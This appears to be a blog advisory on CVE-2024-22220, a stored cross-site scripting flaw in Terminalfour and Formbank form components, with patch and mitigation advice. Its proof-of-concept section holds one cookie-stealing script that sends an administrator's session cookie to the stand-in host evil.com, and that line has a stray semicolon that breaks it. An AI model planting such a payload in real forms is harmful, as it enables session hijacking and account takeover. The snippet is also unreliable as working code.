A critical vulnerability has been discovered in Terminalfour versions 7.4 through 7.4.0004 QP3, 8 through 8.3.19, and Formbank through 2.1.10-FINAL. The vulnerability, CVE-2024-22220, is an unauthenticated stored cross-site scripting (XSS) issue that can lead to admin session hijacking. The attack vectors involve the Form Builder and Form Preview components within the mentioned versions of Terminalfour and Formbank. In this blog post, we will discuss the details of the vulnerability, demonstrate a proof of concept, and provide recommendations to protect against this exploit.

Vulnerability Details

The CVE-2024-22220 vulnerability allows an attacker to inject and execute arbitrary JavaScript within the context of a user's session. The malicious script is stored within the target application, and when other users, including administrators, interact with the affected application, the injected script is executed. This can lead to various attacks, such as session hijacking, where the attacker can steal a user's session cookie and gain unauthorized access to the user's account.

The vulnerability resides in the following components

1. Form Builder: Terminalfour and Formbank's Form Builder component is used to create and manage forms within the application. An attacker can insert malicious JavaScript code within form elements or their descriptions, causing the code to be stored in the backend and executed when a user previews or submits the form.

2. Form Preview: The Form Preview component is used to display a preview of the form before it is published. As the injected JavaScript code is stored within the application, any user who previews the affected form will have the malicious script executed, potentially leading to session hijacking.

Here is a simple proof of concept to demonstrate the vulnerability

Assuming that the attacker wants to steal an administrator's session cookie, they can inject a payload within the vulnerable components (Form Builder or Form Preview) as follows:

<script>document.location = 'https://evil.com/cookie_stealer.php?cookie='; + encodeURIComponent(document.cookie);</script>

In this example, when an administrator previews the affected form, the JavaScript code will send their session cookie to the attacker's server at evil.com. This session cookie can then be used by the attacker to impersonate the administrator and gain unauthorized access.

Original References

1. Terminalfour's official security advisory on CVE-2024-22220: https://www.terminalfour.com/security-updates/cve-2024-22220/
2. CVE-2024-22220 at NIST’s National Vulnerability Database (NVD): https://nvd.nist.gov/vuln/detail/CVE-2024-22220

Recommendations

To protect against the CVE-2024-22220 vulnerability, Terminalfour and Formbank users should apply the following recommendations:

1. Upgrade Terminalfour to the latest version (8.3.20) or apply the relevant security patches provided by Terminalfour.
2. Implement proper input validation for form fields, form descriptions, and submitted data to prevent the injection of malicious JavaScript code.
3. Regularly review and update access controls and permissions to limit the potential impact of a session hijacking attack.
4. Keep your web applications and server software up-to-date with the latest security patches and follow best practices for securing web applications.
5. Consider implementing Content Security Policy (CSP) headers to restrict the execution of inline scripts and prevent the injection of malicious JavaScript code.

Conclusion

The CVE-2024-22220 vulnerability in Terminalfour and Formbank poses a significant security risk due to its potential to lead to admin session hijacking. By following the recommendations provided in this post, administrators and users can help to mitigate these risks and protect their web applications from this critical exploit.

Timeline

Published on: 02/21/2024 16:15:50 UTC
Last modified on: 02/22/2024 19:07:27 UTC